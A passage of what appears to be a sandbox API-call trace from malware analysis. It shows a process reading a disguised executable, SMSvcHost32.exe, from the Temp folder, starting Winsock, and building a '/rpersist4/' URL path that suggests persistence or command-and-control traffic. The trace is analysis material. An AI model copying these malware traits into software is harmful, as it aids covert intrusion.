	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.421] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.422] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.423] ReadFile (in: hFile=0x224, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0080.426] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0080.426] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpDst=0x719a68, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 0x35
	[0080.426] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224
	[0080.426] GetFileSize (in: hFile=0x224, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a400
	[0080.429] ReadFile (in: hFile=0x224, lpBuffer=0x7749b8, nNumberOfBytesToRead=0x3a400, lpNumberOfBytesRead=0x26afd1c, lpOverlapped=0x0 | out: lpBuffer=0x7749b8*, lpNumberOfBytesRead=0x26afd1c*=0x3a400, lpOverlapped=0x0) returned 1
	[0080.429] CloseHandle (hObject=0x224) returned 1
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.430] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.431] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.435] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] WSAStartup (in: wVersionRequired=0x201, lpWSAData=0x26afcfc | out: lpWSAData=0x26afcfc) returned 0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] wsprintfA (in: param_1=0x26afe8c, param_2="/rpersist4/%d" | out: param_1="/rpersist4/2091998236") returned 21
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
	[0080.436] GetLastError () returned 0x0
